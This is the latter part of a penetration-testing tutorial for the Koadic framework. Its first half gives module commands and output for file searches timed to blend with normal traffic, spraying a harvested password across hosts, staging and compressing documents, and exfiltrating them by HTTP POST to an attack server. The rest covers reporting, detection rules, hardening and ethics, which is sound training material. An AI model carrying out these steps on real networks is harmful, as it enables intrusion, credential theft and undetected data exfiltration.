Coordinate activities with normal business hours to blend with legitimate traffic:
use implant/gather/file_search
set ZOMBIE 0
set PATH "C:\Users"
set PATTERN "*.pst,*.ost"
run
Output:
[+] Job 32 started against zombie 0
[+] Note: Large file search may take significant time
[+] Consider scheduling during business hours for better cover
[+] Search initiated at 2025-10-10 09:15:32
Scheduling intensive operations during work hours when users are active provides cover in the network noise.
Credential Spraying
Test harvested credentials across multiple systems systematically:
use implant/lateral/wmi_exec
set ZOMBIE 1
set TARGETS "192.168.1.10,192.168.1.25,192.168.1.50,192.168.1.75"
set USERNAME "user01"
set PASSWORD "P@ssw0rd123!"
run
Output:
[+] Job 33 started against zombie 1
[+] Testing credentials against 4 targets...
192.168.1.10: SUCCESS - Access granted
192.168.1.25: SUCCESS - Access granted
192.168.1.50: FAILED - Access denied
192.168.1.75: SUCCESS - Access granted
[+] 3 of 4 systems compromised
[+] Zombies spawned on successful systems
This automated approach quickly identifies where harvested credentials work, accelerating lateral movement.
Data Staging
Before exfiltration, stage data in a controlled location:
use implant/execute/cmd
set ZOMBIE 1
set CMD "mkdir C:\Windows\Temp\SystemLogs"
run
Output:
[+] Job 34 started against zombie 1
[+] Directory created: C:\Windows\Temp\SystemLogs
Copy sensitive files to the staging directory:
use implant/execute/cmd
set ZOMBIE 1
set CMD "copy C:\Users\user01\Documents\*.xlsx C:\Windows\Temp\SystemLogs\"
run
Output:
[+] Job 35 started against zombie 1
[+] Executing: copy C:\Users\user01\Documents\*.xlsx C:\Windows\Temp\SystemLogs\
7 file(s) copied.
Then compress for efficient exfiltration:
use implant/execute/powershell
set ZOMBIE 1
set CMD "Compress-Archive -Path C:\Windows\Temp\SystemLogs\* -DestinationPath C:\Windows\Temp\logs.zip"
run
Output:
[+] Job 36 started against zombie 1
[+] Archive created successfully
[+] Size: 4.7 MB
[+] Ready for exfiltration
Covert Exfiltration Channels
Use legitimate protocols for data exfiltration to avoid detection:
use implant/exfil/http_post
set ZOMBIE 1
set FILE "C:\Windows\Temp\logs.zip"
set URL "http://192.168.1.100:8080/upload"
run
Output:
[+] Job 37 started against zombie 1
[+] Exfiltrating via HTTP POST...
[+] File: C:\Windows\Temp\logs.zip
[+] Size: 4.7 MB
[+] Progress: [##########] 100%
[+] Transfer complete: 00:01:23
[+] File received on attack server
The data transfers using standard HTTP, making it difficult for network monitoring tools to distinguish from legitimate web traffic.
Reporting and Documentation
Comprehensive documentation transforms your testing activities into actionable intelligence for the client.
Generating Activity Reports
Koadic maintains logs of all activities. Export this information:
report
Output:
[+] Generating activity report...
Session Summary:
- Start Time: 2025-10-10 14:30:15
- End Time: 2025-10-10 16:45:32
- Duration: 2 hours 15 minutes
- Zombies Connected: 4
- Jobs Executed: 37
- Credentials Harvested: 8
- Files Exfiltrated: 15
Compromised Systems:
1. 192.168.1.150 - User: user01 - First Seen: 14:32:15
2. 192.168.1.150 - User: user01 (Elevated) - First Seen: 14:46:18
3. 192.168.1.10 - User: user01 - First Seen: 14:54:22
4. 192.168.1.25 - User: admin - First Seen: 15:23:45
Report saved to: /root/koadic/reports/session_20251010_143015.txt
Documenting Findings
For each vulnerability or weakness exploited, document:
Initial Access Method: How you gained the first foothold
Initial access achieved through MSHTA stager delivered via simulated
phishing email. User executed malicious macro in Word document,
establishing C2 connection at 14:32:15.
Privilege Escalation Path: How you gained elevated privileges
Elevated privileges obtained using eventvwr UAC bypass on zombie 0
at 14:46:18. This technique exploits Windows Event Viewer's
auto-elevation without triggering UAC prompt.
Lateral Movement Techniques: How you spread to additional systems
Lateral movement accomplished using harvested credentials and
PSExec-style execution. Credentials from user01 provided access
to 3 additional systems within the domain.
Data Access: What sensitive information was accessible
Accessed financial reports, employee salary data, and network
diagrams from shared drives. All files were accessible with
standard user privileges, indicating inadequate access controls.
Persistence Mechanisms: How you maintained access
Established persistence using registry run key and scheduled task
on primary target. Both mechanisms survived system reboots during
testing period.
Security Recommendations
Based on your Koadic testing, provide actionable recommendations to improve the client's security posture.
Detection Capabilities
Organizations should implement detection for Koadic-style attacks:
Monitor Suspicious Process Activity: Watch for unusual parent-child process relationships:
Detection Rule Example:
Alert on: mshta.exe spawning PowerShell or cmd.exe
Alert on: regsvr32.exe making network connections
Alert on: wscript.exe executing with unusual command-line arguments
Network Traffic Analysis: Monitor for C2 communication patterns:
Detection Rule Example:
Alert on: Regular beacon intervals from workstations
Alert on: HTTP POST requests with large payloads to unusual destinations
Alert on: Base64-encoded content in HTTP headers
Behavioral Analytics: Identify anomalous user behavior:
Detection Rule Example:
Alert on: User accessing unusual number of files in short period
Alert on: Credential usage from multiple systems simultaneously
Alert on: Off-hours activity by typically inactive accounts
Prevention Measures
Implement controls to prevent or limit Koadic-style attacks:
Application Whitelisting: Restrict which applications can execute:
Recommended Configuration:
- Block script execution in user-writable directories
- Whitelist only approved applications
- Restrict PowerShell execution policies
- Disable Windows Script Host where not required
Principle of Least Privilege: Limit user permissions:
Recommended Configuration:
- Remove local administrator rights from standard users
- Implement Just-In-Time (JIT) admin access
- Segment network access based on role
- Review and restrict share permissions
Network Segmentation: Isolate critical systems:
Recommended Configuration:
- Separate workstation and server VLANs
- Implement micro-segmentation for critical assets
- Restrict lateral movement with host-based firewalls
- Monitor and alert on unusual network flows
Ethical Considerations and Legal Compliance
Using Koadic responsibly requires understanding the ethical and legal framework governing penetration testing.
Rules of Engagement
Before any testing begins, establish clear rules:
Scope Definition: Document exactly which systems, networks, and data are in scope for testing. Any system not explicitly authorized is off-limits.
Time Windows: Define when testing can occur. Some organizations restrict testing to business hours, others to maintenance windows.
Prohibited Actions: Clearly state what actions are not permitted, such as data destruction, denial of service attacks, or social engineering of specific individuals.
Escalation Procedures: Define how to handle unexpected situations, such as discovering evidence of actual compromise or accidentally affecting business operations.
Data Handling: Establish procedures for handling sensitive data discovered during testing, including secure storage, access controls, and destruction after testing concludes.
Responsible Disclosure
When you discover vulnerabilities:
Document Thoroughly: Provide detailed information about each vulnerability, including reproduction steps, potential impact, and recommended remediation.
Prioritize Findings: Help the client understand which issues require immediate attention versus those that can be addressed over time.
Provide Remediation Guidance: Don't just identify problems; offer practical solutions the organization can implement.
Follow Up: Make yourself available to answer questions and verify that remediation efforts successfully address the vulnerabilities.
Conclusion
Koadic represents a powerful framework for assessing Windows security through post-exploitation techniques that mirror real-world attacker behavior. By operating through legitimate Windows utilities and maintaining a fileless presence, it effectively tests an organization's ability to detect and respond to sophisticated threats.
Throughout this guide, we've explored Koadic's capabilities from initial installation through advanced operational techniques. We've seen how to establish command and control, escalate privileges, move laterally across networks, harvest credentials, and exfiltrate data. Each capability corresponds to a phase in the cyber kill chain that organizations must defend against.
The practical examples demonstrate not just how to use individual features, but how to combine them into coherent testing scenarios that provide meaningful security insights. From simulating phishing campaigns to assessing insider threat potential, Koadic enables comprehensive security assessments that help organizations identify weaknesses before malicious actors exploit them.
Remember that Koadic's power comes with significant responsibility. Use it only with proper authorization, document your activities thoroughly, clean up after testing, and provide actionable recommendations that improve security. The goal is not to demonstrate how to break systems, but to help organizations build more resilient defenses.
As security professionals, our role is to think like attackers while acting as defenders. Tools like Koadic help bridge that gap, giving us the capabilities to thoroughly test security controls while maintaining the ethical standards that define our profession. Use this knowledge wisely, always within legal and ethical boundaries, to make the digital world more secure for everyone.